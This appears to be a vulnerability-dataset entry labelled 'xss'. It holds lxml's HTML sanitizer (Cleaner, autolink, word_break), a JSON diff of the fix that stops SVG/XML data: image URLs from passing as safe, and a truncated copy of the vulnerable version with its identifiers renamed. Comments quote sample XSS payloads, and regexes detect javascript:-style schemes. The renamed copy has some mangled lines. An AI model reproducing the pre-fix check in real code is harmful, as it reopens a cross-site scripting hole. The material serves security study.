r'</?[a-zA-Z]+|\son[a-zA-Z]+\s*=',
*((re.ASCII,) if sys.version_info[0] >= 3 else ())).search
# All kinds of schemes besides just javascript: that can cause
# execution:
_find_image_dataurls = re.compile(
r'^data:image/(.+);base64,', re.I).findall
_is_possibly_malicious_scheme = re.compile(
r'(javascript|jscript|livescript|vbscript|data|about|mocha):',
re.I).findall
# SVG images can contain script content
_is_unsafe_image_type = re.compile(r"(xml|svg)", re.I).findall
def _is_javascript_scheme(s):
is_image_url = False
for image_type in _find_image_dataurls(s):
is_image_url = True
if _is_unsafe_image_type(image_type):
return True
if is_image_url:
return False
return bool(_is_possibly_malicious_scheme(s))
_substitute_whitespace = re.compile(r'[\s\x00-\x08\x0B\x0C\x0E-\x19]+').sub
# FIXME: check against: http://msdn2.microsoft.com/en-us/library/ms537512.aspx
_conditional_comment_re = re.compile(
r'\[if[\s\n\r]+.*?][\s\n\r]*>', re.I|re.S)
_find_styled_elements = etree.XPath(
"descendant-or-self::*[@style]")
_find_external_links = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class Cleaner(object):
"""
Instances cleans the document of each of the possible offending
elements. The cleaning is controlled by attributes; you can
override attributes in a subclass, or set them in the constructor.
``scripts``:
Removes any ``<script>`` tags.
``javascript``:
Removes any Javascript, like an ``onclick`` attribute. Also removes stylesheets
as they could contain Javascript.
``comments``:
Removes any comments.
``style``:
Removes any style tags.
``inline_style``
Removes any style attributes. Defaults to the value of the ``style`` option.
``links``:
Removes any ``<link>`` tags
``meta``:
Removes any ``<meta>`` tags
``page_structure``:
Structural parts of a page: ``<head>``, ``<html>``, ``<title>``.
``processing_instructions``:
Removes any processing instructions.
``embedded``:
Removes any embedded objects (flash, iframes)
``frames``:
Removes any frame-related tags
``forms``:
Removes any form tags
``annoying_tags``:
Tags that aren't *wrong*, but are annoying. ``<blink>`` and ``<marquee>``
``remove_tags``:
A list of tags to remove. Only the tags will be removed,
their content will get pulled up into the parent tag.
``kill_tags``:
A list of tags to kill. Killing also removes the tag's content,
i.e. the whole subtree, not just the tag itself.
``allow_tags``:
A list of tags to include (default include all).
``remove_unknown_tags``:
Remove any tags that aren't standard parts of HTML.
``safe_attrs_only``:
If true, only include 'safe' attributes (specifically the list
from the feedparser HTML sanitisation web site).
``safe_attrs``:
A set of attribute names to override the default list of attributes
considered 'safe' (when safe_attrs_only=True).
``add_nofollow``:
If true, then any <a> tags will have ``rel="nofollow"`` added to them.
``host_whitelist``:
A list or set of hosts that you can use for embedded content
(for content like ``<object>``, ``<link rel="stylesheet">``, etc).
You can also implement/override the method
``allow_embedded_url(el, url)`` or ``allow_element(el)`` to
implement more complex rules for what can be embedded.
Anything that passes this test will be shown, regardless of
the value of (for instance) ``embedded``.
Note that this parameter might not work as intended if you do not
make the links absolute before doing the cleaning.
Note that you may also need to set ``whitelist_tags``.
``whitelist_tags``:
A set of tags that can be included with ``host_whitelist``.
The default is ``iframe`` and ``embed``; you may wish to
include other tags like ``script``, or you may want to
implement ``allow_embedded_url`` for more control. Set to None to
include all tags.
This modifies the document *in place*.
"""
scripts = True
javascript = True
comments = True
style = False
inline_style = None
links = True
meta = True
page_structure = True
processing_instructions = True
embedded = True
frames = True
forms = True
annoying_tags = True
remove_tags = None
allow_tags = None
kill_tags = None
remove_unknown_tags = True
safe_attrs_only = True
safe_attrs = defs.safe_attrs
add_nofollow = False
host_whitelist = ()
whitelist_tags = {'iframe', 'embed'}
def __init__(self, **kw):
not_an_attribute = object()
for name, value in kw.items():
default = getattr(self, name, not_an_attribute)
if (default is not None and default is not True and default is not False
and not isinstance(default, (frozenset, set, tuple, list))):
raise TypeError(
"Unknown parameter: %s=%r" % (name, value))
setattr(self, name, value)
if self.inline_style is None and 'inline_style' not in kw:
self.inline_style = self.style
if kw.get("allow_tags"):
if kw.get("remove_unknown_tags"):
raise ValueError("It does not make sense to pass in both "
"allow_tags and remove_unknown_tags")
self.remove_unknown_tags = False
# Used to lookup the primary URL for a given tag that is up for
# removal:
_tag_link_attrs = dict(
script='src',
link='href',
# From: http://java.sun.com/j2se/1.4.2/docs/guide/misc/applet.html
# From what I can tell, both attributes can contain a link:
applet=['code', 'object'],
iframe='src',
embed='src',
layer='src',
# FIXME: there doesn't really seem like a general way to figure out what
# links an <object> tag uses; links often go in <param> tags with values
# that we don't really know. You'd have to have knowledge about specific
# kinds of plugins (probably keyed off classid), and match against those.
##object=?,
# FIXME: not looking at the action currently, because it is more complex
# than than -- if you keep the form, you should keep the form controls.
##form='action',
a='href',
)
def __call__(self, doc):
"""
Cleans the document.
"""
try:
getroot = doc.getroot
except AttributeError:
pass # Element instance
else:
doc = getroot() # ElementTree instance, instead of an element
# convert XHTML to HTML
xhtml_to_html(doc)
# Normalize a case that IE treats <image> like <img>, and that
# can confuse either this step or later steps.
for el in doc.iter('image'):
el.tag = 'img'
if not self.comments:
# Of course, if we were going to kill comments anyway, we don't
# need to worry about this
self.kill_conditional_comments(doc)
kill_tags = set(self.kill_tags or ())
remove_tags = set(self.remove_tags or ())
allow_tags = set(self.allow_tags or ())
if self.scripts:
kill_tags.add('script')
if self.safe_attrs_only:
safe_attrs = set(self.safe_attrs)
for el in doc.iter(etree.Element):
attrib = el.attrib
for aname in attrib.keys():
if aname not in safe_attrs:
del attrib[aname]
if self.javascript:
if not (self.safe_attrs_only and
self.safe_attrs == defs.safe_attrs):
# safe_attrs handles events attributes itself
for el in doc.iter(etree.Element):
attrib = el.attrib
for aname in attrib.keys():
if aname.startswith('on'):
del attrib[aname]
doc.rewrite_links(self._remove_javascript_link,
resolve_base_href=False)
# If we're deleting style then we don't have to remove JS links
# from styles, otherwise...
if not self.inline_style:
for el in _find_styled_elements(doc):
old = el.get('style')
new = _replace_css_javascript('', old)
new = _replace_css_import('', new)
if self._has_sneaky_javascript(new):
# Something tricky is going on...
del el.attrib['style']
elif new != old:
el.set('style', new)
if not self.style:
for el in list(doc.iter('style')):
if el.get('type', '').lower().strip() == 'text/javascript':
el.drop_tree()
continue
old = el.text or ''
new = _replace_css_javascript('', old)
# The imported CSS can do anything; we just can't allow:
new = _replace_css_import('', new)
if self._has_sneaky_javascript(new):
# Something tricky is going on...
el.text = '/* deleted */'
elif new != old:
el.text = new
if self.comments:
kill_tags.add(etree.Comment)
if self.processing_instructions:
kill_tags.add(etree.ProcessingInstruction)
if self.style:
kill_tags.add('style')
if self.inline_style:
etree.strip_attributes(doc, 'style')
if self.links:
kill_tags.add('link')
elif self.style or self.javascript:
# We must get rid of included stylesheets if Javascript is not
# allowed, as you can put Javascript in them
for el in list(doc.iter('link')):
if 'stylesheet' in el.get('rel', '').lower():
# Note this kills alternate stylesheets as well
if not self.allow_element(el):
el.drop_tree()
if self.meta:
kill_tags.add('meta')
if self.page_structure:
remove_tags.update(('head', 'html', 'title'))
if self.embedded:
# FIXME: is <layer> really embedded?
# We should get rid of any <param> tags not inside <applet>;
# These are not really valid anyway.
for el in list(doc.iter('param')):
parent = el.getparent()
while parent is not None and parent.tag not in ('applet', 'object'):
parent = parent.getparent()
if parent is None:
el.drop_tree()
kill_tags.update(('applet',))
# The alternate contents that are in an iframe are a good fallback:
remove_tags.update(('iframe', 'embed', 'layer', 'object', 'param'))
if self.frames:
# FIXME: ideally we should look at the frame links, but
# generally frames don't mix properly with an HTML
# fragment anyway.
kill_tags.update(defs.frame_tags)
if self.forms:
remove_tags.add('form')
kill_tags.update(('button', 'input', 'select', 'textarea'))
if self.annoying_tags:
remove_tags.update(('blink', 'marquee'))
_remove = []
_kill = []
for el in doc.iter():
if el.tag in kill_tags:
if self.allow_element(el):
continue
_kill.append(el)
elif el.tag in remove_tags:
if self.allow_element(el):
continue
_remove.append(el)
if _remove and _remove[0] == doc:
# We have to drop the parent-most tag, which we can't
# do. Instead we'll rewrite it:
el = _remove.pop(0)
el.tag = 'div'
el.attrib.clear()
elif _kill and _kill[0] == doc:
# We have to drop the parent-most element, which we can't
# do. Instead we'll clear it:
el = _kill.pop(0)
if el.tag != 'html':
el.tag = 'div'
el.clear()
_kill.reverse() # start with innermost tags
for el in _kill:
el.drop_tree()
for el in _remove:
el.drop_tag()
if self.remove_unknown_tags:
if allow_tags:
raise ValueError(
"It does not make sense to pass in both allow_tags and remove_unknown_tags")
allow_tags = set(defs.tags)
if allow_tags:
# make sure we do not remove comments/PIs if users want them (which is rare enough)
if not self.comments:
allow_tags.add(etree.Comment)
if not self.processing_instructions:
allow_tags.add(etree.ProcessingInstruction)
bad = []
for el in doc.iter():
if el.tag not in allow_tags:
bad.append(el)
if bad:
if bad[0] is doc:
el = bad.pop(0)
el.tag = 'div'
el.attrib.clear()
for el in bad:
el.drop_tag()
if self.add_nofollow:
for el in _find_external_links(doc):
if not self.allow_follow(el):
rel = el.get('rel')
if rel:
if ('nofollow' in rel
and ' nofollow ' in (' %s ' % rel)):
continue
rel = '%s nofollow' % rel
else:
rel = 'nofollow'
el.set('rel', rel)
def allow_follow(self, anchor):
"""
Override to suppress rel="nofollow" on some anchors.
"""
return False
def allow_element(self, el):
"""
Decide whether an element is configured to be accepted or rejected.
:param el: an element.
:return: true to accept the element or false to reject/discard it.
"""
if el.tag not in self._tag_link_attrs:
return False
attr = self._tag_link_attrs[el.tag]
if isinstance(attr, (list, tuple)):
for one_attr in attr:
url = el.get(one_attr)
if not url:
return False
if not self.allow_embedded_url(el, url):
return False
return True
else:
url = el.get(attr)
if not url:
return False
return self.allow_embedded_url(el, url)
def allow_embedded_url(self, el, url):
"""
Decide whether a URL that was found in an element's attributes or text
if configured to be accepted or rejected.
:param el: an element.
:param url: a URL found on the element.
:return: true to accept the URL and false to reject it.
"""
if self.whitelist_tags is not None and el.tag not in self.whitelist_tags:
return False
scheme, netloc, path, query, fragment = urlsplit(url)
netloc = netloc.lower().split(':', 1)[0]
if scheme not in ('http', 'https'):
return False
if netloc in self.host_whitelist:
return True
return False
def kill_conditional_comments(self, doc):
"""
IE conditional comments basically embed HTML that the parser
doesn't normally see. We can't allow anything like that, so
we'll kill any comments that could be conditional.
"""
has_conditional_comment = _conditional_comment_re.search
self._kill_elements(
doc, lambda el: has_conditional_comment(el.text),
etree.Comment)
def _kill_elements(self, doc, condition, iterate=None):
bad = []
for el in doc.iter(iterate):
if condition(el):
bad.append(el)
for el in bad:
el.drop_tree()
def _remove_javascript_link(self, link):
# links like "j a v a s c r i p t:" might be interpreted in IE
new = _substitute_whitespace('', unquote_plus(link))
if _is_javascript_scheme(new):
# FIXME: should this be None to delete?
return ''
return link
_substitute_comments = re.compile(r'/\*.*?\*/', re.S).sub
def _has_sneaky_javascript(self, style):
"""
Depending on the browser, stuff like ``e x p r e s s i o n(...)``
can get interpreted, or ``expre/* stuff */ssion(...)``. This
checks for attempt to do stuff like this.
Typically the response will be to kill the entire style; if you
have just a bit of Javascript in the style another rule will catch
that and remove only the Javascript from the style; this catches
more sneaky attempts.
"""
style = self._substitute_comments('', style)
style = style.replace('\\', '')
style = _substitute_whitespace('', style)
style = style.lower()
if 'javascript:' in style:
return True
if 'expression(' in style:
return True
if '@import' in style:
return True
if '</noscript' in style:
# e.g. '<noscript><style><a title="</noscript><img src=x onerror=alert(1)>">'
return True
if _looks_like_tag_content(style):
# e.g. '<math><style><img src=x onerror=alert(1)></style></math>'
return True
return False
def clean_html(self, html):
result_type = type(html)
if isinstance(html, basestring):
doc = fromstring(html)
else:
doc = copy.deepcopy(html)
self(doc)
return _transform_result(result_type, doc)
clean = Cleaner()
clean_html = clean.clean_html
############################################################
## Autolinking
############################################################
_link_regexes = [
re.compile(r'(?P<body>https?://(?P<host>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
# This is conservative, but autolinking can be a bit conservative:
re.compile(r'mailto:(?P<body>[a-z0-9._-]+@(?P<host>[a-z0-9_.-]+[a-z]))', re.I),
]
_avoid_elements = ['textarea', 'pre', 'code', 'head', 'select', 'a']
_avoid_hosts = [
re.compile(r'^localhost', re.I),
re.compile(r'\bexample\.(?:com|org|net)$', re.I),
re.compile(r'^127\.0\.0\.1$'),
]
_avoid_classes = ['nolink']
def autolink(el, link_regexes=_link_regexes,
avoid_elements=_avoid_elements,
avoid_hosts=_avoid_hosts,
avoid_classes=_avoid_classes):
"""
Turn any URLs into links.
It will search for links identified by the given regular
expressions (by default mailto and http(s) links).
It won't link text in an element in avoid_elements, or an element
with a class in avoid_classes. It won't link to anything with a
host that matches one of the regular expressions in avoid_hosts
(default localhost and 127.0.0.1).
If you pass in an element, the element's tail will not be
substituted, only the contents of the element.
"""
if el.tag in avoid_elements:
return
class_name = el.get('class')
if class_name:
class_name = class_name.split()
for match_class in avoid_classes:
if match_class in class_name:
return
for child in list(el):
autolink(child, link_regexes=link_regexes,
avoid_elements=avoid_elements,
avoid_hosts=avoid_hosts,
avoid_classes=avoid_classes)
if child.tail:
text, tail_children = _link_text(
child.tail, link_regexes, avoid_hosts, factory=el.makeelement)
if tail_children:
child.tail = text
index = el.index(child)
el[index+1:index+1] = tail_children
if el.text:
text, pre_children = _link_text(
el.text, link_regexes, avoid_hosts, factory=el.makeelement)
if pre_children:
el.text = text
el[:0] = pre_children
def _link_text(text, link_regexes, avoid_hosts, factory):
leading_text = ''
links = []
last_pos = 0
while 1:
best_match, best_pos = None, None
for regex in link_regexes:
regex_pos = last_pos
while 1:
match = regex.search(text, pos=regex_pos)
if match is None:
break
host = match.group('host')
for host_regex in avoid_hosts:
if host_regex.search(host):
regex_pos = match.end()
break
else:
break
if match is None:
continue
if best_pos is None or match.start() < best_pos:
best_match = match
best_pos = match.start()
if best_match is None:
# No more matches
if links:
assert not links[-1].tail
links[-1].tail = text
else:
assert not leading_text
leading_text = text
break
link = best_match.group(0)
end = best_match.end()
if link.endswith('.') or link.endswith(','):
# These punctuation marks shouldn't end a link
end -= 1
link = link[:-1]
prev_text = text[:best_match.start()]
if links:
assert not links[-1].tail
links[-1].tail = prev_text
else:
assert not leading_text
leading_text = prev_text
anchor = factory('a')
anchor.set('href', link)
body = best_match.group('body')
if not body:
body = link
if body.endswith('.') or body.endswith(','):
body = body[:-1]
anchor.text = body
links.append(anchor)
text = text[end:]
return leading_text, links
def autolink_html(html, *args, **kw):
result_type = type(html)
if isinstance(html, basestring):
doc = fromstring(html)
else:
doc = copy.deepcopy(html)
autolink(doc, *args, **kw)
return _transform_result(result_type, doc)
autolink_html.__doc__ = autolink.__doc__
############################################################
## Word wrapping
############################################################
_avoid_word_break_elements = ['pre', 'textarea', 'code']
_avoid_word_break_classes = ['nobreak']
def word_break(el, max_width=40,
avoid_elements=_avoid_word_break_elements,
avoid_classes=_avoid_word_break_classes,
break_character=unichr(0x200b)):
"""
Breaks any long words found in the body of the text (not attributes).
Doesn't effect any of the tags in avoid_elements, by default
``<textarea>`` and ``<pre>``
Breaks words by inserting ​, which is a unicode character
for Zero Width Space character. This generally takes up no space
in rendering, but does copy as a space, and in monospace contexts
usually takes up space.
See http://www.cs.tut.fi/~jkorpela/html/nobr.html for a discussion
"""
# Character suggestion of ​ comes from:
# http://www.cs.tut.fi/~jkorpela/html/nobr.html
if el.tag in _avoid_word_break_elements:
return
class_name = el.get('class')
if class_name:
dont_break = False
class_name = class_name.split()
for avoid in avoid_classes:
if avoid in class_name:
dont_break = True
break
if dont_break:
return
if el.text:
el.text = _break_text(el.text, max_width, break_character)
for child in el:
word_break(child, max_width=max_width,
avoid_elements=avoid_elements,
avoid_classes=avoid_classes,
break_character=break_character)
if child.tail:
child.tail = _break_text(child.tail, max_width, break_character)
def word_break_html(html, *args, **kw):
result_type = type(html)
doc = fromstring(html)
word_break(doc, *args, **kw)
return _transform_result(result_type, doc)
def _break_text(text, max_width, break_character):
words = text.split()
for word in words:
if len(word) > max_width:
replacement = _insert_break(word, max_width, break_character)
text = text.replace(word, replacement)
return text
_break_prefer_re = re.compile(r'[^a-z]', re.I)
def _insert_break(word, width, break_character):
orig_word = word
result = ''
while len(word) > width:
start = word[:width]
breaks = list(_break_prefer_re.finditer(start))
if breaks:
last_break = breaks[-1]
# Only walk back up to 10 characters to find a nice break:
if last_break.end() > width-10:
# FIXME: should the break character be at the end of the
# chunk, or the beginning of the next chunk?
start = word[:last_break.end()]
result += start + break_character
word = word[len(start):]
result += word
return result
| xss | {
"code": [
"_is_image_dataurl = re.compile(",
" r'^data:image/.+;base64', re.I).search",
" r'(?:javascript|jscript|livescript|vbscript|data|about|mocha):',",
" re.I).search",
" if _is_image_dataurl(s):",
" return None",
" return _is_possibly_malicious_scheme(s)"
],
"line_no": [
78,
79,
81,
82,
84,
85,
86
]
} | {
"code": [
"_find_image_dataurls = re.compile(",
" r'^data:image/(.+);base64,', re.I).findall",
" r'(javascript|jscript|livescript|vbscript|data|about|mocha):',",
" re.I).findall",
"_is_unsafe_image_type = re.compile(r\"(xml|svg)\", re.I).findall",
" for image_type in _find_image_dataurls(s):",
" if _is_unsafe_image_type(image_type):",
" if is_image_url:",
" return False"
],
"line_no": [
78,
79,
81,
82,
84,
88,
90,
92,
93
]
} |
from __future__ import absolute_import
import copy
import re
import .sys
try:
from urlparse import .urlsplit
from urllib import unquote_plus
except ImportError:
from urllib.parse import .urlsplit, unquote_plus
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
VAR_70
except NameError:
VAR_70 = chr
try:
VAR_71
except NameError:
VAR_71 = str
try:
VAR_72
except NameError:
VAR_72 = (str, bytes)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
VAR_0 = re.compile(
r'expression\VAR_5*\(.*?\)', re.S|re.I).sub
VAR_1 = re.compile(
r'@\VAR_5*import', re.I).sub
VAR_2 = re.compile(
r'</?[a-zA-Z]+|\son[a-zA-Z]+\VAR_5*=',
*((re.ASCII,) if sys.version_info[0] >= 3 else ())).search
VAR_3 = re.compile(
r'^data:image/.+;base64', re.I).search
VAR_4 = re.compile(
r'(?:VAR_34|jscript|livescript|vbscript|data|about|mocha):',
re.I).search
def FUNC_0(VAR_5):
if VAR_3(VAR_5):
return None
return VAR_4(VAR_5)
VAR_6 = re.compile(r'[\VAR_5\x00-\x08\x0B\x0C\x0E-\x19]+').sub
VAR_7 = re.compile(
r'\[if[\VAR_5\n\r]+.*?][\VAR_5\n\r]*>', re.I|re.S)
VAR_8 = etree.XPath(
"descendant-or-self::*[@VAR_36]")
VAR_9 = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class CLASS_0(object):
VAR_33 = True
VAR_34 = True
VAR_35 = True
VAR_36 = False
VAR_37 = None
VAR_38 = True
VAR_39 = True
VAR_40 = True
VAR_41 = True
VAR_42 = True
VAR_43 = True
VAR_44 = True
VAR_45 = True
VAR_46 = None
VAR_47 = None
VAR_48 = None
VAR_49 = True
VAR_50 = True
VAR_51 = defs.safe_attrs
VAR_52 = False
VAR_53 = ()
VAR_54 = {'iframe', 'embed'}
def __init__(self, **VAR_25):
VAR_73 = object()
for name, value in VAR_25.items():
VAR_94 = getattr(self, name, VAR_73)
if (VAR_94 is not None and VAR_94 is not True and VAR_94 is not False
and not isinstance(VAR_94, (frozenset, set, tuple, list))):
raise TypeError(
"Unknown parameter: %VAR_5=%r" % (name, value))
setattr(self, name, value)
if self.inline_style is None and 'inline_style' not in VAR_25:
self.inline_style = self.style
if VAR_25.get("allow_tags"):
if VAR_25.get("remove_unknown_tags"):
raise ValueError("It does not make sense to pass in both "
"allow_tags and remove_unknown_tags")
self.remove_unknown_tags = False
VAR_55 = dict(
script='src',
VAR_61='href',
applet=['code', 'object'],
iframe='src',
embed='src',
layer='src',
a='href',
)
def __call__(self, VAR_56):
try:
VAR_95 = VAR_56.getroot
except AttributeError:
pass # Element instance
else:
VAR_56 = VAR_95() # ElementTree instance, instead of an element
xhtml_to_html(VAR_56)
for VAR_16 in VAR_56.iter('image'):
VAR_16.tag = 'img'
if not self.comments:
self.kill_conditional_comments(VAR_56)
VAR_48 = set(self.kill_tags or ())
VAR_46 = set(self.remove_tags or ())
VAR_47 = set(self.allow_tags or ())
if self.scripts:
VAR_48.add('script')
if self.safe_attrs_only:
VAR_51 = set(self.safe_attrs)
for VAR_16 in VAR_56.iter(etree.Element):
VAR_100 = VAR_16.attrib
for aname in VAR_100.keys():
if aname not in VAR_51:
del VAR_100[aname]
if self.javascript:
if not (self.safe_attrs_only and
self.safe_attrs == defs.safe_attrs):
for VAR_16 in VAR_56.iter(etree.Element):
VAR_100 = VAR_16.attrib
for aname in VAR_100.keys():
if aname.startswith('on'):
del VAR_100[aname]
VAR_56.rewrite_links(self._remove_javascript_link,
resolve_base_href=False)
if not self.inline_style:
for VAR_16 in VAR_8(VAR_56):
VAR_105 = VAR_16.get('style')
VAR_84 = VAR_0('', VAR_105)
VAR_84 = VAR_1('', VAR_84)
if self._has_sneaky_javascript(VAR_84):
del VAR_16.attrib['style']
elif VAR_84 != VAR_105:
VAR_16.set('style', VAR_84)
if not self.style:
for VAR_16 in list(VAR_56.iter('style')):
if VAR_16.get('type', '').lower().strip() == 'text/javascript':
VAR_16.drop_tree()
continue
VAR_105 = VAR_16.text or ''
VAR_84 = VAR_0('', VAR_105)
VAR_84 = VAR_1('', VAR_84)
if self._has_sneaky_javascript(VAR_84):
VAR_16.text = '/* deleted */'
elif VAR_84 != VAR_105:
VAR_16.text = VAR_84
if self.comments:
VAR_48.add(etree.Comment)
if self.processing_instructions:
VAR_48.add(etree.ProcessingInstruction)
if self.style:
VAR_48.add('style')
if self.inline_style:
etree.strip_attributes(VAR_56, 'style')
if self.links:
VAR_48.add('link')
elif self.style or self.javascript:
for VAR_16 in list(VAR_56.iter('link')):
if 'stylesheet' in VAR_16.get('rel', '').lower():
if not self.allow_element(VAR_16):
VAR_16.drop_tree()
if self.meta:
VAR_48.add('meta')
if self.page_structure:
VAR_46.update(('head', 'html', 'title'))
if self.embedded:
for VAR_16 in list(VAR_56.iter('param')):
VAR_101 = VAR_16.getparent()
while VAR_101 is not None and VAR_101.tag not in ('applet', 'object'):
VAR_101 = VAR_101.getparent()
if VAR_101 is None:
VAR_16.drop_tree()
VAR_48.update(('applet',))
VAR_46.update(('iframe', 'embed', 'layer', 'object', 'param'))
if self.frames:
VAR_48.update(defs.frame_tags)
if self.forms:
VAR_46.add('form')
VAR_48.update(('button', 'input', 'select', 'textarea'))
if self.annoying_tags:
VAR_46.update(('blink', 'marquee'))
VAR_74 = []
VAR_75 = []
for VAR_16 in VAR_56.iter():
if VAR_16.tag in VAR_48:
if self.allow_element(VAR_16):
continue
VAR_75.append(VAR_16)
elif VAR_16.tag in VAR_46:
if self.allow_element(VAR_16):
continue
VAR_74.append(VAR_16)
if VAR_74 and VAR_74[0] == VAR_56:
VAR_16 = VAR_74.pop(0)
VAR_16.tag = 'div'
VAR_16.attrib.clear()
elif VAR_75 and VAR_75[0] == VAR_56:
VAR_16 = VAR_75.pop(0)
if VAR_16.tag != 'html':
VAR_16.tag = 'div'
VAR_16.clear()
VAR_75.reverse() # VAR_92 with innermost tags
for VAR_16 in VAR_75:
VAR_16.drop_tree()
for VAR_16 in VAR_74:
VAR_16.drop_tag()
if self.remove_unknown_tags:
if VAR_47:
raise ValueError(
"It does not make sense to pass in both VAR_47 and remove_unknown_tags")
VAR_47 = set(defs.tags)
if VAR_47:
if not self.comments:
VAR_47.add(etree.Comment)
if not self.processing_instructions:
VAR_47.add(etree.ProcessingInstruction)
VAR_83 = []
for VAR_16 in VAR_56.iter():
if VAR_16.tag not in VAR_47:
VAR_83.append(VAR_16)
if VAR_83:
if VAR_83[0] is VAR_56:
VAR_16 = VAR_83.pop(0)
VAR_16.tag = 'div'
VAR_16.attrib.clear()
for VAR_16 in VAR_83:
VAR_16.drop_tag()
if self.add_nofollow:
for VAR_16 in VAR_9(VAR_56):
if not self.allow_follow(VAR_16):
VAR_106 = VAR_16.get('rel')
if VAR_106:
if ('nofollow' in VAR_106
and ' nofollow ' in (' %VAR_5 ' % VAR_106)):
continue
VAR_106 = '%VAR_5 nofollow' % VAR_106
else:
VAR_106 = 'nofollow'
VAR_16.set('rel', VAR_106)
def FUNC_8(self, VAR_57):
return False
def FUNC_9(self, VAR_16):
if VAR_16.tag not in self._tag_link_attrs:
return False
VAR_76 = self._tag_link_attrs[VAR_16.tag]
if isinstance(VAR_76, (list, tuple)):
for one_attr in VAR_76:
VAR_58 = VAR_16.get(one_attr)
if not VAR_58:
return False
if not self.allow_embedded_url(VAR_16, VAR_58):
return False
return True
else:
VAR_58 = VAR_16.get(VAR_76)
if not VAR_58:
return False
return self.allow_embedded_url(VAR_16, VAR_58)
def FUNC_10(self, VAR_16, VAR_58):
if self.whitelist_tags is not None and VAR_16.tag not in self.whitelist_tags:
return False
VAR_77, VAR_78, VAR_79, VAR_80, VAR_81 = urlsplit(VAR_58)
VAR_78 = netloc.lower().split(':', 1)[0]
if VAR_77 not in ('http', 'https'):
return False
if VAR_78 in self.host_whitelist:
return True
return False
def FUNC_11(self, VAR_56):
VAR_82 = VAR_7.search
self._kill_elements(
VAR_56, lambda VAR_16: VAR_82(VAR_16.text),
etree.Comment)
def FUNC_12(self, VAR_56, VAR_59, VAR_60=None):
VAR_83 = []
for VAR_16 in VAR_56.iter(VAR_60):
if VAR_59(VAR_16):
VAR_83.append(VAR_16)
for VAR_16 in VAR_83:
VAR_16.drop_tree()
def FUNC_13(self, VAR_61):
VAR_84 = VAR_6('', unquote_plus(VAR_61))
if FUNC_0(VAR_84):
return ''
return VAR_61
VAR_62 = re.compile(r'/\*.*?\*/', re.S).sub
def FUNC_14(self, VAR_36):
VAR_36 = self._substitute_comments('', VAR_36)
VAR_36 = VAR_36.replace('\\', '')
VAR_36 = VAR_6('', VAR_36)
VAR_36 = VAR_36.lower()
if 'javascript:' in VAR_36:
return True
if 'expression(' in VAR_36:
return True
if '@import' in VAR_36:
return True
if '</noscript' in VAR_36:
return True
if VAR_2(VAR_36):
return True
return False
def VAR_11(self, VAR_23):
VAR_66 = type(VAR_23)
if isinstance(VAR_23, VAR_72):
VAR_56 = fromstring(VAR_23)
else:
VAR_56 = copy.deepcopy(VAR_23)
self(VAR_56)
return _transform_result(VAR_66, VAR_56)
VAR_10 = CLASS_0()
VAR_11 = VAR_10.clean_html
VAR_12 = [
re.compile(r'(?P<VAR_90>https?://(?P<VAR_104>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
re.compile(r'mailto:(?P<VAR_90>[a-z0-9._-]+@(?P<VAR_104>[a-z0-9_.-]+[a-z]))', re.I),
]
VAR_13 = ['textarea', 'pre', 'code', 'head', 'select', 'a']
VAR_14 = [
re.compile(r'^localhost', re.I),
re.compile(r'\bexample\.(?:com|org|net)$', re.I),
re.compile(r'^127\.0\.0\.1$'),
]
VAR_15 = ['nolink']
def FUNC_1(VAR_16, VAR_17=VAR_12,
VAR_18=VAR_13,
VAR_19=VAR_14,
VAR_20=VAR_15):
if VAR_16.tag in VAR_18:
return
VAR_63 = VAR_16.get('class')
if VAR_63:
VAR_63 = VAR_63.split()
for match_class in VAR_20:
if match_class in VAR_63:
return
for child in list(VAR_16):
FUNC_1(child, VAR_17=link_regexes,
VAR_18=avoid_elements,
VAR_19=avoid_hosts,
VAR_20=avoid_classes)
if child.tail:
VAR_21, VAR_96 = FUNC_2(
child.tail, VAR_17, VAR_19, VAR_22=VAR_16.makeelement)
if VAR_96:
child.tail = VAR_21
VAR_102 = VAR_16.index(child)
VAR_16[VAR_102+1:VAR_102+1] = VAR_96
if VAR_16.text:
VAR_21, VAR_85 = FUNC_2(
VAR_16.text, VAR_17, VAR_19, VAR_22=VAR_16.makeelement)
if VAR_85:
VAR_16.text = VAR_21
VAR_16[:0] = VAR_85
def FUNC_2(VAR_21, VAR_17, VAR_19, VAR_22):
VAR_64 = ''
VAR_38 = []
VAR_65 = 0
while 1:
VAR_86, VAR_87 = None, None
for regex in VAR_17:
VAR_97 = VAR_65
while 1:
VAR_103 = regex.search(VAR_21, pos=VAR_97)
if VAR_103 is None:
break
VAR_104 = VAR_103.group('host')
for host_regex in VAR_19:
if host_regex.search(VAR_104):
VAR_97 = VAR_103.end()
break
else:
break
if VAR_103 is None:
continue
if VAR_87 is None or VAR_103.start() < VAR_87:
VAR_86 = VAR_103
VAR_87 = VAR_103.start()
if VAR_86 is None:
if VAR_38:
assert not VAR_38[-1].tail
VAR_38[-1].tail = VAR_21
else:
assert not VAR_64
leading_text = VAR_21
break
VAR_61 = VAR_86.group(0)
VAR_88 = VAR_86.end()
if VAR_61.endswith('.') or VAR_61.endswith(','):
VAR_88 -= 1
VAR_61 = link[:-1]
VAR_89 = VAR_21[:VAR_86.start()]
if VAR_38:
assert not VAR_38[-1].tail
VAR_38[-1].tail = VAR_89
else:
assert not VAR_64
leading_text = VAR_89
VAR_57 = VAR_22('a')
VAR_57.set('href', VAR_61)
VAR_90 = VAR_86.group('body')
if not VAR_90:
VAR_90 = VAR_61
if VAR_90.endswith('.') or VAR_90.endswith(','):
VAR_90 = body[:-1]
VAR_57.text = VAR_90
VAR_38.append(VAR_57)
VAR_21 = text[VAR_88:]
return VAR_64, VAR_38
def FUNC_3(VAR_23, *VAR_24, **VAR_25):
